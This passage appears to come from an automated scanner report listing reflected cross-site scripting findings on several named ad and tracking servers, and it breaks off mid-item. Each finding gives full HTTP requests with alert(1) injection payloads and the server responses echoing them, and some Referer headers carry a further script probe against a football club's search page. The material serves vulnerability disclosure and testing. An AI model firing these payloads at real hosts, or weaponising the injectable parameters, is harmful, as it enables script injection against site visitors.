This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=&b0d5b"-alert(1)-"4f51d7bed73=1 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19731

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599382601;key=key1+key2+key3+key4;nodecode=yes;link=&b0d5b"-alert(1)-"4f51d7bed73=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink
...[SNIP]...

4.14. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7beee'-alert(1)-'f8a39a000c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=&7beee'-alert(1)-'f8a39a000c8=1 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19731

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
="")
{    AT_COUNT=''
if ('2046906'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599384152;key=key1+key2+key3+key4;nodecode=yes;link=&7beee'-alert(1)-'f8a39a000c8=1')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE2046906+"'))";
AT_TARGET2046906="_self";
}
window.AT_ClickFn2046906= function (click)
{    click=(i
...[SNIP]...

4.15. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|512|2042949|0|2384|ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44b21"-alert(1)-"24010b6fd5a was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=44b21"-alert(1)-"24010b6fd5a HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19701

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599803020;key=key1+key2+key3+key4;nodecode=yes;link=44b21"-alert(1)-"24010b6fd5a") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|9
...[SNIP]...

4.16. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|512|2042949|0|2384|ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5b2a'-alert(1)-'76580ad7740 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=f5b2a'-alert(1)-'76580ad7740 HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19701

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
!="")
{    AT_COUNT=''
if ('2046906'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599805634;key=key1+key2+key3+key4;nodecode=yes;link=f5b2a'-alert(1)-'76580ad7740')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE2046906+"'))";
AT_TARGET2046906="_self";
}
window.AT_ClickFn2046906= function (click)
{    click=(isN
...[SNIP]...

4.17. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|512|2042949|0|2384|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca286"-alert(1)-"e3c10b470be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=&ca286"-alert(1)-"e3c10b470be=1 HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19731

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599813136;key=key1+key2+key3+key4;nodecode=yes;link=&ca286"-alert(1)-"e3c10b470be=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink
...[SNIP]...

4.18. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|512|2042949|0|2384|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fff1'-alert(1)-'90730b7d240 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=&8fff1'-alert(1)-'90730b7d240=1 HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19731

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
="")
{    AT_COUNT=''
if ('2046906'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599814481;key=key1+key2+key3+key4;nodecode=yes;link=&8fff1'-alert(1)-'90730b7d240=1')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE2046906+"'))";
AT_TARGET2046906="_self";
}
window.AT_ClickFn2046906= function (click)
{    click=(i
...[SNIP]...

4.19. http://api.bizographics.com/v2/profile.redirect [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v2/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 62f3a<script>alert(1)</script>1d58073aa6e was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/profile.redirect?api_key=1be3a6866fd64648a7b0c808e855170262f3a<script>alert(1)</script>1d58073aa6e&group_delimiter=,&industry_delimiter=,&functional_area_delimiter=,&callback_url=http://aud.pubmatic.com/AdServer/Artemis?dpid=7 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=26071&s=26072&a=21044
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 03 Oct 2011 00:13:27 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=626db0cb-3cd9-459b-b19f-8fbed9cce7e8;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (1be3a6866fd64648a7b0c808e855170262f3a<script>alert(1)</script>1d58073aa6e)

4.20. http://api.wipmania.com/jsonp [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.wipmania.com
Path:   /jsonp

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d34b6<script>alert(1)</script>48f0c9a2585 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsonp?callback=jsonp1317602099166d34b6<script>alert(1)</script>48f0c9a2585&_=1317602106543 HTTP/1.1
Host: api.wipmania.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:35:11 GMT
Content-Type: application/x-javascript
Connection: close
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 198

jsonp1317602099166d34b6<script>alert(1)</script>48f0c9a2585({"latitude":"44.9718","longitude":"-113.3405","zoom":3,"address":{"city":"-","country":"United States","country_code":"US","region":"-"}})

4.21. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 8dc7c<script>alert(1)</script>a181b15a895 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction8dc7c<script>alert(1)</script>a181b15a895&n=ar_int_p119936314&1317599990670 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1317599974%2E004%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:01:29 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction8dc7c<script>alert(1)</script>a181b15a895("");

4.22. http://as.chango.com/links/adunit/1.31759988192e+12 [adpos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the adpos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b14f"><script>alert(1)</script>63d7f247e9a was submitted in the adpos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=07b14f"><script>alert(1)</script>63d7f247e9a&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "9dedf6fa7c3e35355f673e63293624ee42b80e94"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:58:49 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:58:49 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:58:49 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
on&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=07b14f"><script>alert(1)</script>63d7f247e9a&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickURL=">
...[SNIP]...

4.23. http://as.chango.com/links/adunit/1.31759988192e+12 [atype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the atype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb5ee"><script>alert(1)</script>a99bc9549b1 was submitted in the atype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORICcb5ee"><script>alert(1)</script>a99bc9549b1&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "5b2700f3bc17003c1b06ba969270be02e1b1af91"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:58:55 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:58:55 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:58:55 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
27704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORICcb5ee"><script>alert(1)</script>a99bc9549b1&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickURL=">
...[SNIP]...

4.24. http://as.chango.com/links/adunit/1.31759988192e+12 [bidder parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the bidder request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14194"><script>alert(1)</script>1438e1bd2b4 was submitted in the bidder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west14194"><script>alert(1)</script>1438e1bd2b4&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "94e76ad5f7c529cdda89711f9bf9ce49199412b1"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:58:59 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:58:59 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:58:59 GMT; Path=/

